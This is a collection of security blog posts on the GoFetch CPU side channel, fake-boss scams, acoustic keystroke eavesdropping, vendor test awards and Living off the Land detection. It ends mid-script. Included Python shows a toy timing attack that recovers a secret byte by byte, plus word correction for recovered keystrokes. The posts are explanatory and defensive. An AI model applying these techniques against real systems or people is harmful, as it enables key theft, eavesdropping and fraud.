GoFetch: Apple CPU encryption hack | Kaspersky official blog

In mid-March, researchers from several U.S. universities published a paper demonstrating a hardware vulnerability in Apple’s “M” series CPUs. These CPUs, based on the ARM architecture and designed by Apple, power most of its newer laptops and desktops, as well as some iPad models. The issue could potentially be exploited to break encryption algorithms. The attack that uses this vulnerability was dubbed “GoFetch”.

The combination of a juicy topic and a big-name manufacturer like Apple led to this highly technical paper being picked up by a wide range of media outlets — both technical and not so much. Many ran with alarmist headlines like “Don’t Trust Your Private Data to Apple Laptops”. In reality, the situation isn’t quite that dire. However, to really get to the bottom of this new problem, we need to delve a little into how CPUs work — specifically by discussing three concepts: data prefetching, constant-time programming, and side-channel attacks. As always, we’ll try to explain everything in the simplest terms possible.

Data prefetching

The CPU of a desktop computer or laptop executes programs represented as machine code. Loosely speaking, it’s a bunch of numbers — some representing instructions and others representing data for calculations. At this fundamental level, we’re talking about very basic commands: fetch some data from memory, compute something with this data, and write the result back to memory.

You’d think these operations should be executed in this order. Here’s a simple example: a user enters their password to access a cryptocurrency wallet. The computer needs to read the password from RAM, run a few computing operations, check that this is the correct password, and only then grant access to the confidential data. If this were the way today’s CPUs executed all code, our computers would be painfully slow. So how do you speed things up? You do a lot of optimization — such as data prefetching.

Data prefetching works like this: if the program code contains a command to fetch data, why not load it ahead of time to speed things up? Then, should the data come in handy at some point, we’ve just made the program run a bit faster. No big deal if it doesn’t come in handy: we’d just discard it from the CPU’s cache and fetch something else.

That’s how basic data prefetching works. Apple CPUs make use of a newer prefetcher known as “data memory-dependent prefetcher”, or DMP. In a nutshell, DMP is more aggressive. Commands to fetch data from memory are not always explicit. Pointers to specific memory locations might be the result of computing work that still needs to be performed, or they might be stored in a data array that the program will access later. DMP tries to guess which data in the program is a pointer to a memory location. The logic is the same: if something looks like a pointer, try fetching data at that address. The guessing process relies on the history of recent operations — even if they belong to a completely different program.

In 2022, another study demonstrated that DMP tends to confuse pointers with other data the program is working with. This isn’t necessarily a problem by itself — loading the wrong stuff into the CPU cache isn’t a big deal. But it becomes a problem when it comes to encryption algorithms. DMP can break constant-time programming under certain conditions. Let’s talk about this next.

Constant-time programming

There’s a simple rule: the time it takes to process data must not depend on the contents of that data. In cryptography, this is a fundamental principle for protecting implementations of encryption algorithms from attack. Attackers often probe an algorithm by feeding it chosen inputs and observing the output, without knowing the secret key in use. If they can figure out that key, they can decrypt everything else protected by it, such as network traffic or passwords saved on the system.

A carelessly written implementation processes some inputs faster than others, for example because it takes a different branch, or skips work, depending on the value of a key bit. That gives the attacker a powerful tool: simply by measuring how long the operation takes for different inputs, they can potentially reconstruct the secret key.

Mainstream cryptographic libraries are written to resist this: their authors make sure that the sequence of operations, and therefore the running time, is the same regardless of the key and the input. Testing the robustness of an implementation always includes attempts to violate this principle. The Hertzbleed attack, for example, showed that even constant-time code can leak through the CPU’s dynamic frequency scaling. A timing difference is itself a side channel; the question for the attacker is how to observe it, and in the case of GoFetch the observable channel is the CPU cache.
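To make the constant-time rule concrete, here is an added example in Python (not from the GoFetch paper or from any library): a naive comparison that stops at the first mismatching byte, a constant-time one that always does the same work, and an "attacker" that recovers a constructed secret byte by byte using nothing but how much work the comparison did. The count of bytes examined stands in for elapsed time, since that is exactly what a timing measurement would reveal; a Python interpreter gives no real constant-time guarantees, so the point is the structure of the code, not its wall-clock behaviour.

```python
from __future__ import annotations

# Added illustration of the constant-time principle. The secret is constructed
# for the example; the attacker never sees it, only the oracle's answers.
SECRET = b"s3cr3t-k"


def early_exit_compare(secret: bytes, guess: bytes) -> tuple[bool, int]:
    """Naive comparison: stops at the first mismatching byte.
    Returns (equal, bytes_examined); the second value depends on the secret."""
    if len(secret) != len(guess):
        return False, 0
    examined = 0
    for s, g in zip(secret, guess):
        examined += 1
        if s != g:                      # secret-dependent early exit
            return False, examined
    return True, examined


def constant_time_compare(secret: bytes, guess: bytes) -> tuple[bool, int]:
    """Constant-time comparison: always examines every byte, accumulates the
    differences with OR, and branches on the secret only once, at the end."""
    if len(secret) != len(guess):
        return False, 0
    diff = 0
    examined = 0
    for s, g in zip(secret, guess):
        examined += 1
        diff |= s ^ g                   # no branch on the data
    return diff == 0, examined


def make_oracle(compare, secret: bytes = SECRET):
    """What the attacker gets: a yes/no answer plus a timing proxy."""
    return lambda guess: compare(secret, guess)


def recover_secret(oracle, length: int):
    """Byte-by-byte recovery driven only by the oracle's timing proxy.
    Returns the secret, or None if the timing carries no information."""
    recovered = bytearray()
    for pos in range(length):
        work = {}
        for candidate in range(256):
            guess = bytes(recovered) + bytes([candidate]) + b"\x00" * (length - pos - 1)
            accepted, examined = oracle(guess)
            if accepted:                # the whole guess matched
                return guess
            work[candidate] = examined
        if len(set(work.values())) == 1:
            # Every candidate cost the same amount of work: nothing leaks.
            return None
        # The one candidate that made the compare go a byte further is right.
        recovered.append(max(work, key=work.get))
    return bytes(recovered)


if __name__ == "__main__":
    print(recover_secret(make_oracle(early_exit_compare), len(SECRET)))    # → b's3cr3t-k'
    print(recover_secret(make_oracle(constant_time_compare), len(SECRET)))  # → None
```

With the early-exit comparison, 256 tries per byte are enough to recover the whole secret; with the constant-time version every candidate costs the same and the attacker learns nothing. Real libraries provide such primitives (for example `hmac.compare_digest` in Python), and GoFetch matters precisely because it leaks even when code like `constant_time_compare` is used correctly.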

Side-channel attack

If DMP sometimes confuses regular application data with a memory pointer, can it mistake a piece of a secret key for a pointer? It turns out it can. The researchers demonstrated this in practice using two popular cryptographic libraries: Go’s standard crypto library, and OpenSSL (used for TLS traffic encryption and much else). They investigated several algorithms, including the ubiquitous RSA and Diffie-Hellman as well as CRYSTALS-Kyber-512 and CRYSTALS-Dilithium-2, which are designed to resist attacks by quantum computers. When DMP takes a value derived from the key, treats it as a pointer and fetches memory at that address, whether a fetch happens at all (and roughly where) depends on the key. That dependency is what leaks the key to the attacker.

There’s one catch: the hypothetical malware that performs this attack cannot read the cache directly. It has no way to see what DMP loaded into the cache, or from which RAM address. But if the direct route is closed, information can still be extracted through a side channel, and here it’s a basic property of every modern computer: data that’s already in the CPU cache is accessed noticeably faster than data that has to be fetched from RAM.

Let’s put the attack together. We have an unprivileged malicious program that can feed chosen inputs to the victim’s cryptographic code (for example, by asking it to decrypt ciphertexts of the attacker’s choosing). The inputs are crafted so that an intermediate value computed during the operation looks like a pointer only if certain bits of the secret key have the values the attacker guessed. When the guess is right, DMP dereferences that value and pulls a cache line into the cache; when it’s wrong, nothing is fetched. The attacker can’t see this directly, but they can detect it by timing accesses to memory they control: if DMP’s fetch filled or evicted a particular cache line, the access time changes slightly. Repeating this for every bit of the key recovers it. This is how the researchers defeated constant-time programming: the cryptographic code itself still runs in constant time, but the prefetcher’s key-dependent behavior shows up as cache timing differences that the attacker can measure.

So, is your data at risk?

In practice, extracting a key requires dozens to hundreds of thousands of such operations as the attacker feeds inputs to the algorithm and indirectly monitors the cache after each one. The attack is reliable but very resource-intensive: stealing a key takes about an hour at best and more than ten hours at worst, and for all that time the computing load keeps the device running near full capacity. The GoFetch website has a video demonstration in which the private key is extracted bit by bit, literally.

Screenshot from the research demo video. Source

However, that’s not what makes the attack impractical. We’ve repeatedly mentioned that the attack requires malicious code to be running on the victim’s computer. It doesn’t need administrator rights, but if an attacker can already run their own program in the user’s session, there are usually far simpler ways to get at that user’s data than a multi-hour cache-timing attack. This is also why the OpenSSL developers did not treat the researchers’ report as a security issue: local side-channel attacks of this kind fall outside their threat model.

All studies like this can be compared to civil engineering. To make a structure robust, engineers need to study the characteristics of the materials to be used, the given location’s soil properties, make provisions for the risk of earthquakes, and do many other things. In most cases, even a poorly constructed building will stand for decades without problems. However, a rare combination of circumstances may lead to disaster. Attack scenarios like GoFetch are designed to avert such disasters that lead to mass leaks of user secrets.

The researchers are going to continue studying this fairly new prefetching mechanism. Intel processors have had a DMP since the 13th generation, but the researchers found its activation criteria restrictive enough that the attack described in the paper did not work there. What’s important is that the vulnerability can’t be patched in the hardware: it will affect Apple’s M1 and M2 CPUs for their entire lifespan. The only way to prevent this type of attack is to change the cryptographic software. One option is to run sensitive computations only on the CPU’s “energy-efficient” cores, as the DMP is present only on the “high-performance” cores. Another is to mask (blind) keys and intermediate values so that nothing derived from the secret ever looks like a pointer in memory. Both cost some performance, though the user would hardly notice. Apple’s M3 CPUs, in turn, have a special processor flag (a data-independent-timing mode) that disables the DMP for particularly sensitive operations, but software has to enable it.

Let’s summarize. There’s no immediate threat to data stored on Apple devices — hardly anyone would try using a technique this complex to steal that data. Nevertheless, the work of these U.S. researchers is still valuable because it sheds some light on hitherto-unknown operating aspects of how the latest CPUs work. Their efforts aim to prevent future problems that might arise if an easier exploit is discovered.

Kaspersky official blog – ​Read More

How to tell that what appears to be a message from your boss is actually the beginning of a scam attack | Kaspersky official blog

Imagine getting a call or message from your immediate senior — or maybe even the head honcho of the whole company. They warn you about a nasty situation brewing. It spells fines or some other financial woes for the company, big trouble for your department, and possible dismissal for you personally! Cold sweat trickles down your spine, but there’s still a chance to save the day! You’ll have to hustle and do a few things you don’t usually do, but everything should be alright…

First – hold your horses and take a few deep breaths. There’s a 99% chance this whole “emergency” is completely made up and the person on the line is a scammer. But how do you recognize such an attack and protect yourself?

Anatomy of the attack

These schemes come in dozens of flavors. Scammers may describe various issues faced by your company depending on the particular country, cite involvement of regulators, police, or major business partners, and then suggest all manner of ways to “solve the problem” with your help. Yet there are a number of key points — crucial psychological footholds — without which the attack is next to impossible to carry out. These can be used to recognize the attack for what it is.

The superior’s authority, or simple trust in someone you know. Most people by now have developed a resistance to odd requests from strangers — be it a police officer who’s decided to reach out through instant messaging, or a bank employee personally concerned about your wellbeing. This scheme is different: the person approaching the victim appears to be someone you know to some extent — and a fairly important person at that. Scammers often choose a C-level manager’s profile as bait. First, they have authority; second, chances are the victim knows the person, but not well enough to spot the inevitable differences in speech or writing style. However, there are variations on this scheme where the scammers impersonate a coworker from a relevant department (such as accounting or legal) whom you may not know personally.
Redirection to an external party. In the most primitive cases, the “coworker” or “manager” who reaches out to you is also the person you get a request about money from. Most often though, after the initial contact, the “boss” suggests you discuss the details of the matter with an external contractor who’s about to reach out. Depending on the scheme’s specifics, this “assigned person” may be introduced as a law enforcement or tax officer, bank employee, auditor or similar; i.e., not someone the victim knows. The “boss” will ask you to provide the “designated person” with all the assistance they’ll need and without delay. That said, the most elaborate schemes, such as the one with $25 million stolen following a deepfake video conference, may have the scammers pose as company employees throughout.
A request has to be urgent, so as not to give the victim time to stop and analyze the situation. “The audit is tomorrow”, “the partner’s just arrived”, “the amount gets charged this afternoon”… long story short, you have to act right now. Scammers will often conduct this part of the conversation by phone, telling the victim not to hang up until the money is transferred.
Absolute secrecy. To prevent anyone from interfering with the fraud, the “boss” early on warns the victim that discussing the incident with anyone is strictly forbidden as disclosure would lead to disastrous consequences. The fraudster might say that they’ve no one else to trust, or that some of the other employees are criminals or disloyal to the company. They will generally try to keep the victim from talking to anyone until their demands are met.

Example of a scam email from a fake boss

Objectives of the attack

Depending on the victim’s position and level of income, an attack may pursue different goals. If the victim is authorized by the company to execute financial transactions, the scammers will try to talk them into making an urgent secret payment to a vendor such as a law firm for assistance in solving problems — or just transferring the company’s money to a “safe” account.

Employees who don’t deal with the company’s money can be targeted by attacks that seek to obtain company data such as passwords to internal systems, or their own funds. Scammers may come up with dozens of backstories, ranging from an accounting data leak that jeopardizes the victim’s account, to a need to keep the company’s cash gap closed until an audit is done. In the latter case, the victim is asked to use their own money in some way: transfer it to another account, pay for gift cards or vouchers, or withdraw it and give it to a “trusted person”. For greater persuasiveness, the scammers may promise the victim generous compensation for their expenses and effort — only later.

Convincing level of detail

Social media posts and numerous data leaks have made it much easier for fraudsters to launch carefully prepared, personalized attacks. They can: find the full names of the victim, their immediate senior, the CEO, and employees in the relevant departments (such as accounting), along with the exact department names; and find pictures of these individuals to create convincing instant messaging profiles and, if needed, even voice samples to create audio deepfakes. If there’s big money at stake, the scammers may invest significant time in making the charade as convincing as can be. In some previous cases, attackers even knew the locations of company departments inside buildings and the positions of individual employees’ desks.

Technical side of the attack

Sophisticated schemes like this nearly always include a phone call from the scammers; however, the initial “call from the boss” may also come in the form of an email or instant message. In simpler versions of the attack, the scammers just create a new instant messaging or email account with the manager’s name, while in more sophisticated cases they hack their corporate email or personal accounts. This is called a BEC (business email compromise) attack.

As for phone calls, scammers often use number spoofing services or obtain an illegal copy of the SIM card — the victim’s caller ID then displays the company’s general phone number or even their boss’s own.

Malicious actors may use deepfake voice generators, so a familiar voice on the other end of the line can’t guarantee the caller’s authenticity. Schemes like these may even use video calling where the caller’s face is also a deepfake.

Protecting yourself against scammers

First and foremost, attentiveness and courage to verify the information despite the scammers’ threats are two things that can protect you against this kind of attack.

Take it slow, and don’t panic. The scammers aim to knock you off balance. Keep calm and double-check all the facts. Even if the other party insists you don’t hang up the phone, you can always pretend that the call dropped. This will buy you some time to do more fact-checking.

Pay attention to the sender’s address, phone, and user name. If you’re used to corresponding with your boss by email, but then you suddenly get an instant message in their name from an unfamiliar number, it’s time to prick up your ears. If you’ve always talked on an instant messaging app and you get a new message but there’s no history, this means someone’s using a newly created account, which is a major red flag. Unfortunately, cybercriminals sometimes use fake email addresses that are hard to tell from the real ones, or hacked email or instant messaging accounts. All of this makes detecting forgery much more difficult.

Pay attention to small details. If a person you know approaches you with an odd request, is there anything about the situation that tells you that the person may be an impostor? Do their emails look slightly unusual? Are they using uncharacteristic figures of speech? Do you usually address each other by first names, but they’re using a formal form of address? Try asking them something only the real person could know.

Raise a red flag if you get an unusual request. If your boss or coworker is urgently asking you to do something unusual — and to keep it a secret to boot — this is nearly always a sign of a scam. Therefore, it’s critical that you verify the information you get and confirm the other party’s identity. The least you can do is contact that person using a different channel of communication. Talking in person is best, but if this isn’t a possibility, call their office or home number that you’ve got down in your phone book, or punch in that number manually; don’t just dial the last incoming number — to avoid circling back to the scammers. Use any other channels of communication available. The cell number that called you — even if it’s your boss or coworker’s real number you’ve gotten saved in your phone book — might have been compromised through SIM swapping or simple phone theft.

Check with your coworkers. Despite being asked to “keep it all confidential”, depending on the nature of the request, it doesn’t hurt to verify the information with your coworkers. If you get what appears to be a message from someone in accounting, contact other people in the same department.

Warn your coworkers and law enforcement. If you receive such a message, it means scammers are targeting your organization and coworkers. If their tricks don’t work on you, they’ll try the next department. Warn your coworkers, warn security, and report the attempted scam to the police.

Eavesdropping on keyboard keystrokes | Kaspersky official blog

U.S. researchers recently published a paper demonstrating that useful information can be extracted from the sounds of keystrokes. This is certainly not the first study of its kind; moreover, the results can’t even be considered more accurate than the conclusions of its predecessors. However, what makes this one interesting is that the researchers weren’t aiming for perfect, lab-controlled conditions. Instead, they wanted to see how it works in fairly realistic conditions: a somewhat noisy room, a not-so-great microphone, and so on.

Attack model

We often get eavesdropped on without even realizing it. And I’m not referring to spy movie clichés with bugs planted in offices and hotel rooms.

Imagine you’re stuck in a boring conference call at work and, at the same time, you’re discreetly catching up on work emails or personal messages without muting your microphone. Guess what? Your colleagues can hear your keystrokes. Streamers — those who love broadcasting their gaming sessions (and other stuff) — are also at risk. They might get distracted mid-stream and, for example, type a password on the keyboard. While the keyboard itself may not be visible, someone could record the sound of the keystrokes, analyze the recording, and try to figure out what was typed.

The first scientific study examining such an attack in detail was published in 2004. Back then, IBM researchers merely proposed a method and demonstrated the basic possibility of distinguishing one keystroke from another, but nothing more. Five years later in 2009, the same researchers attempted to solve the problem using a neural network: a special algorithm was trained on a 10-minute recording of keyboard input, with the text known in advance. This made it possible to associate specific keystroke sounds with typed letters. As a result, the neural network recognized up to 96% of the characters typed.

However, this result was obtained in a lab-controlled environment. The room was completely silent, a high-quality microphone was used, and the text was typed more or less consistently (with roughly the same typing speed and keystroke force). Moreover, a loud mechanical keyboard was used. This study demonstrated the theoretical possibility of an attack, but its results were difficult to apply in practice: if you change the typing style slightly, change the keyboard, or add natural ambient noise to the room, recognition becomes impossible.

Real-life eavesdropping

Everyone has their own unique way of typing. The researchers found patterns in these individual styles, which helped them analyze the sounds of keystrokes. For instance, they discovered that people tend to type common letter pairs at a consistent speed. They also found that it’s fairly easy to distinguish individual words, since the sounds of the spacebar and Enter key are usually distinct from other keys.

During the experiments, the researchers assumed that the potential eavesdropping victim would be typing in an office with a normal level of background noise. Other than that, there were no special restrictions on the participants. They could use any keyboard and type however they wanted. The recording was done on a low-quality, built-in laptop microphone. For a successful attack, however, a potential spy needs to record a sufficiently long sequence of keystrokes — otherwise, it won’t be possible to train the neural network. The recording looks something like this:

Shape of the audio signal corresponding to certain keystrokes. Source

Each peak in amplitude corresponds to a specific keystroke. The pause between keystrokes may vary depending on the user’s typing skill and the sequence of letters being typed. In this study, the neural network was trained to recognize these pauses specifically, and as it turns out, they also carry a lot of information — no less than the differences in keystroke sounds themselves!

An important breakthrough in this new study was the use of the neural network to predict whole words. For example, if the neural network identifies the word “goritla” from the keystrokes, then we can confidently assert that the user actually typed “gorilla”, and there was just an error in recognition. The more letters in a word, the more accurately it can be guessed. This rule applies to up to six-letter words — beyond which the accuracy doesn’t increase.
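The word-level correction described above, as an added illustration in Python (not the researchers’ model): a character-level recogniser has produced a noisy string, and each word is snapped to the closest entry in a vocabulary by edit distance. The vocabulary and the noisy input are constructed for the example; the real study used a neural network trained on typing data rather than a dictionary lookup, but the effect it exploits is the same: a long word with one misrecognised letter usually has only one plausible correction.

```python
# Added illustration: post-processing a noisy keystroke transcription by
# snapping each word to its nearest vocabulary entry. Not the paper's model.

# Constructed vocabulary; a real attacker would use a large word-frequency list.
VOCAB = ["the", "a", "ate", "gorilla", "guerrilla", "girl", "banana",
         "password", "login", "transfer", "secret"]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: minimum number of single-character insertions,
    deletions and substitutions that turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # delete ca
                           cur[j - 1] + 1,               # insert cb
                           prev[j - 1] + (ca != cb)))    # substitute
        prev = cur
    return prev[-1]


def candidates(noisy: str, vocab=VOCAB, max_distance: int = 2) -> list:
    """All vocabulary words within max_distance, closest first. The shorter
    the word, the more candidates typically survive, which is why short
    words are guessed less reliably than long ones."""
    scored = [(edit_distance(noisy, w), abs(len(w) - len(noisy)), w) for w in vocab]
    return [w for d, _, w in sorted(scored) if d <= max_distance]


def correct_word(noisy: str, vocab=VOCAB, max_distance: int = 2) -> str:
    """Return the closest vocabulary word, or the raw string if nothing is
    close enough. The keystroke count is known from the number of peaks in
    the audio, so ties are broken in favour of a word of the same length."""
    found = candidates(noisy, vocab, max_distance)
    return found[0] if found else noisy


def correct_text(recognised: str, vocab=VOCAB) -> str:
    """Space and Enter sound distinct from letter keys, so word boundaries
    are assumed to be recovered correctly; each word is corrected on its own."""
    return " ".join(correct_word(w, vocab) for w in recognised.split())


if __name__ == "__main__":
    print(correct_text("the goritla ate a banaba"))  # → the gorilla ate a banana
```

A string that matches nothing within the distance bound is left alone rather than forced onto a dictionary word, which is the right behaviour for passwords: they are exactly the input this correction step cannot help with, as the text below notes.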

A total of 20 volunteers participated in the experiment. First, they typed an already-known text, which was then correlated with the keystroke sounds and used to train the recognition algorithm. Next, the subjects typed a secret text, which the neural network tried to decipher based on the typing patterns and how well it matched real words. The accuracy varied from person to person, but on average the AI correctly guessed 43% of the text just from the keystroke sounds.

Side channels all around us

This is yet another example of a side-channel attack — when information is leaked indirectly. We’ve written a lot about such attacks. For example, here is a method of espionage using a light sensor. Here we talked about extracting sound from video data by analyzing tiny vibrations in the image. Phone conversations can be eavesdropped on using an accelerometer – the sensor built into every smartphone. The indirect channels of information leakage are indeed many.

But out of all these attacks, extracting text by analyzing keystroke sounds is the most viable in practice. When we enter a credit card number or password, we can hide the keyboard from prying eyes, but protecting yourself from eavesdropping isn’t so easy.

Of course, a 43% accuracy rate in guessing the text might not sound that impressive — especially considering it’s guessing whole words, not random characters like you’d expect in a password. Still, this new research is a significant step toward making this type of attack practical. It’s not quite there yet, but imagine someone in a café or on the train potentially stealing your password, credit card number, or even your private messages just by listening to you typing.

Perhaps future research will bring us closer to this dangerous scenario. But even now we can outline methods of protecting against such attacks and start applying them to particularly sensitive data right away. For starters, avoid typing passwords or other secret information during conference calls — especially during public online events. For many reasons, we recommend using two-factor authentication — it protects well against various password compromise scenarios.

Finally, there’s a way to counteract this specific side-channel attack. It’s based on the fact that you have a certain consistent pattern of typing on the keyboard. Want to make it harder for those sneaky hackers? Break the pattern: mix up your typing style. Both super-slow and super-fast typing can work wonders.

Transatlantic Cable podcast episode 340 | Kaspersky official blog

Episode 340 of the Transatlantic Cable podcast kicks off with news that the EU is investigating Meta, Apple and Google for “uncompetitive practices.” Additionally, the US government has gone ahead and levelled a lawsuit against Apple, for what they see as “monopoly” behaviour with their hardware.

To wrap up, the team discuss two stories, the first around China and UK government hacking concerns and how age-verification for adult sites could actually be a bad thing in the long run.

If you liked what you heard, please consider subscribing.

Apple, Meta and Google to be investigated by the EU
US sues Apple for illegal monopoly over smartphones
Beijing behind cyberattacks on UK MPs and peers, deputy PM to warn
The Dangers of Age Verification

Best Defense in 2024 | Kaspersky official blog

Choosing the right cybersecurity solution is no easy task. Friends’ opinions and/or crowdsourced ratings — which are great for simpler products and services — are less reliable. While these can help with assessing user interfaces and overall usability, they’re not much good for assessing the quality of protection against advanced threats.

The most balanced, objective source is independent expert research by specialized testing labs and media. Yes, independent — they must have no ties to any vendor whose products they evaluate whatsoever.

We’ve always taken independent testing of our products and services seriously. For a quick and easy way to see how we’ve been doing over the years, our website has a Top-3 section showing how many tests we took part in during a year, and in how many of them we finished on the podium.

2023 was a record year for us: out of precisely a hundred tests featuring our solutions, 93 times we came first, and 94 times finished in the top-three. And since 2013, our products have been tested by independent researchers a total of 927 times, claiming 680 first places (and 779 top-three finishes). This is the absolute record among all security solutions vendors both in terms of the number of tests and the number of victories.

Now for a little more detail.

Comparative chart with the results of independent security testing of popular vendors. Kaspersky is the absolute leader: 680 first places out of 927 tests conducted. Source

Most significant awards

Last year’s achievements are too numerous to list in their entirety, so we’ll highlight the most outstanding:

Kaspersky Standard was named Product of the Year by AV-Comparatives. So pleased were we, we even dedicated a separate blog post to the story.
Kaspersky Plus for Windows underwent all of SE Labs’ quarterly Endpoint Security: Home 2023 tests, and earned the highest total accuracy rating of 100% in all four of them.
Kaspersky Safe Kids was awarded Parental Control certification by AV-Comparatives for blocking at least 98 percent of pornographic websites with zero false positives on child-friendly websites.
Kaspersky Plus for Mac picked up its first Best MacOS Security Award for Consumer Users from AV-Test, with perfect results in its Mac security testing over the course of the whole year.
A trio of our products – Kaspersky Standard, Kaspersky Endpoint Security for Business and Kaspersky Small Office Security – won AV-Test’s Best Advanced Protection 2023 award for exceptional protection against APT attacks deploying ransomware and data stealers. These products also received the Best Usability 2023 award for the lowest number of false positives, the maximum score in all categories (including protection, performance, and usability), as well as the “Top Product” award based on AV-TEST’s results for Windows antivirus software for both home and business.
Kaspersky Endpoint Detection and Response gained recognition as “Strategic Leader” for achieving a 100% active response cumulative score in AV-Comparatives’ Endpoint Prevention & Response (EPR). The solution was also awarded AV-TEST’s Approved Advanced Endpoint Detection and Response Certification for demonstrating impressive coverage and valuable analytics in a study that involved a series of red-team attacks that replicated the tactics of both the Hafnium and Lazarus hacking groups. Additionally, the solution was recognized by SE Labs in its Enterprise Advanced Security (EDR) test, receiving the highest AAA rating for detecting all targeted attacks with no false positives.
Kaspersky Endpoint Security for Business and Kaspersky Small Office Security were awarded AAA ratings in all SE Labs’ Endpoint Security: Enterprise 2023 and Endpoint Security: SMB 2023 comparative tests, respectively.

Who does the testing?

For those unfamiliar with the world of cybersecurity testing, here’s a rundown of the key players.

AV-Comparatives is an independent Austrian organization that’s been testing security products for over 24 years. During this time, what started out as a student project at the University of Innsbruck has grown into one of the most influential research centers in cybersecurity.
AV-Test GmbH is an independent German information-security research institute. It has been advising industry associations, companies, and government agencies on cybersecurity for more than 15 years.
SE Labs is an independent UK company that has developed next-generation product testing based on a comprehensive approach to security assessment.

Alternative approach

Of course, besides serious testing labs, there are specialized media and bloggers that evaluate security software. Their research may be a little less meticulous, but in terms of the grabbing of users’ attention (aka “influencing”:), YouTubers and tech wordsmiths can’t be beat.

If this format floats your boat, we recommend checking out tests (for example, 1, 2 and 3) on the PC Security Channel, run by a UK-based YouTuber. The channel’s killer feature is the many tech gurus among its subscribers, who like to cast a critical eye over the posted content and add their own valuable observations.

Kaspersky official blog – ​Read More

Ways to detect and curb Living off the Land (LotL) attacks | Kaspersky official blog

Should serious-minded attackers choose your company specifically as a target, they’d certainly be looking to gain a long-term, persistent presence in your infrastructure. Some would deploy high-end malware to achieve this – but others prefer not to. Many, in fact, prefer to attack companies by exploiting vulnerabilities, stolen credentials, and legitimate programs that are already in the system. This technique – known as Living off the Land (LotL) – has many advantages from an attacker’s point of view:

Malicious activity blends in with everyday network and administrative activities.
Tools already installed on computers are less likely to trigger endpoint protection (EPP).
There’s no need to spend time and resources on developing one’s own malicious tools.
Such activity doesn’t produce obvious indicators of compromise (IoC), making it hard to trace malicious activity and compare attacks across organizations.
Many companies fail to collect and store information about network monitoring and day-to-day network activity in sufficient detail, so it’s impossible to track the evolution of an attack in real time – much less historically. This makes preventing attacks and mitigating their consequences extremely tricky.

LotL tactics are used by various groups: spy groups (see here and here), money-minded cybercriminals, and ransomware gangs.

Environments prone to LotL attacks

LotL attacks can be carried out in any environment: cloud, on-premises, hybrid; on Windows, Linux, and macOS platforms. Incidentally, attacks on macOS are sometimes known as Living off the Orchard – a reference to, yes, apples. In each of these environments, attackers have a variety of tools and techniques at their disposal:

Windows. Tools useful to attackers are usually called LOLBins (LOL binaries) or LOLBAS (LOL binaries and scripts). We analyzed the most popular LOLBins; a more complete list of all Windows tools seen in attacks can be found in this GitHub repository. To escalate privileges and disable defenses, threat actors can exploit legitimate software drivers, a list of which is available at loldrivers.io.
Unix/Linux. An extensive list of tools exploited by attackers can be found in the gtfobins repository on GitHub.
macOS. “Orchard” tools used in attacks are available at io.

It should be reiterated here that all the files listed in the links above are legitimate tools. They aren’t vulnerable per se, but can be used by an attacker who’s penetrated a system and gained sufficient privileges.

What’s stopping you from detecting LotL?

Even if an organization has a high level of information security maturity – with an expert team and advanced protective tools – in practice, defenders may be hampered in detecting LotL attacks due to the following reasons:

Non-adapted settings. Even advanced security tools need to be adapted to the specifics of the organization and the particularities of network segmentation, user-server interaction, and typical IT-system operating scenarios. Correlation rules need to be created and customized based on the available threat intelligence and known characteristics of the company. Sometimes defenders rely too heavily on IoC detection, and don’t pay enough attention to potentially dangerous behavioral signals. Sometimes InfoSec or IT services use broad exclusion rules and extensive allowlists that include many LOLBAS simply because they’re legitimate applications. All of the above significantly lowers the effectiveness of protection.
Inadequate logging. The standard level of logging in many systems doesn’t allow for the detection of malicious activity, storage of event parameters sufficient for incident analysis, or reliable differentiation between legitimate administrative actions and malicious ones.
Insufficient automation. Malicious actions buried in a heap of logs can only be detected after preliminary filtering and removal of background noise. The most effective source of pre-filtered data is EDR telemetry: EDR collects only the relevant events, increases flexibility in detecting attacker techniques, and reduces false positives. Without filtering and automated analysis, logs are useless – there are simply too many of them.
Isolation from IT. The above issues would be especially acute if IT and InfoSec services have little interaction: InfoSec is unfamiliar with IT work regulations, tool settings, and so on. In addition, if the teams don’t talk to each other, an investigation into suspicious activity can drag on for weeks or even months – during all of which time the threat actors would be further developing their attacks.

How to detect LotL attacks

There are many practical cybersecurity recommendations for detecting LotL attacks – none of them exhaustive. The most recent and detailed public guidance comes from cyber agencies in the US, UK, and Australia. But even there, the authors emphasize that they’re only providing best practice benchmarks.

The most practical, effective, and implementable detection tips are as follows:

Implement detailed event logging. Collect logs in a centralized repository that’s write-once and disallows modifications. This prevents attackers from deleting or changing logs. Centralization of logs is critical because it enables behavioral analysis, retrospective searches, and targeted threat hunting. It also often makes it possible to save logs for longer periods of time.
 
To be useful, logs must be comprehensive and verbose. They must log security events – including all commands in management consoles (shells), as well as system calls, PowerShell activity, WMI event traces, and so on. It’s worth reiterating that standard logging configurations rarely cover all necessary events. What’s more, in some cloud environments, the right level of logging is only available as part of costly service packages. After Microsoft 365 customers got burned last year, Microsoft revised its policy.
 
For proper implementation of logging, SIEM (centralization, aggregation, and event analysis) and EDR (collection of necessary telemetry from hosts) are indispensable tools.
Identify and record typical, day-to-day activity of network devices, servers, applications, users, and administrators. To gather information about baseline behavior in a particular network, SIEM is recommended: all normal sequences of events, service relationships and the like are clear to see. Special attention should be paid to the analysis of “administrative” behavior, and the use of specific tools by privileged accounts – including system ones. Keep the number of administrative tools to a minimum, with detailed logging of their operation; use of other similar tools should be either blocked or set to trigger alerts. For administrator accounts, it’s important to analyze what time they are in use, what commands they run and in what sequence, what devices they interact with, and so on.
Use automated systems (such as machine learning models) to continuously analyze logs, match them against typical activity, and report anomalies to InfoSec. Ideally, implement user and entity behavior analytics (UEBA).
Continuously update settings to reduce background noise and adjust low-impact alerts or downgrade their priority.
 
You can fine-tune monitoring rules and alert triggers to better distinguish between routine administrative actions and potentially dangerous behavior. Avoid overly broad rules that will burden systems and analysts alike, such as “CommandLine=*”. Work with the IT team to reduce the variety of administration utilities used, their accessibility on unrelated systems, and the number of available protocols and types of accounts for logging in to corporate systems.
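The baseline-driven approach described in the tips above (admin tools only from known accounts, only on privileged workstations, only at expected times, and no “CommandLine=*” style catch-all) can be expressed as a small detection rule. The script below is an added example written for this post, not tooling from Kaspersky or any vendor; the event records, the baseline (account names, PAW host names, business hours) and the list of administrative binaries are constructed for illustration and would come from the organization’s own SIEM/EDR and inventory in practice.

```python
"""Baseline-driven detection of admin-tool (LOLBin) use over process-creation events."""
import json
from datetime import datetime

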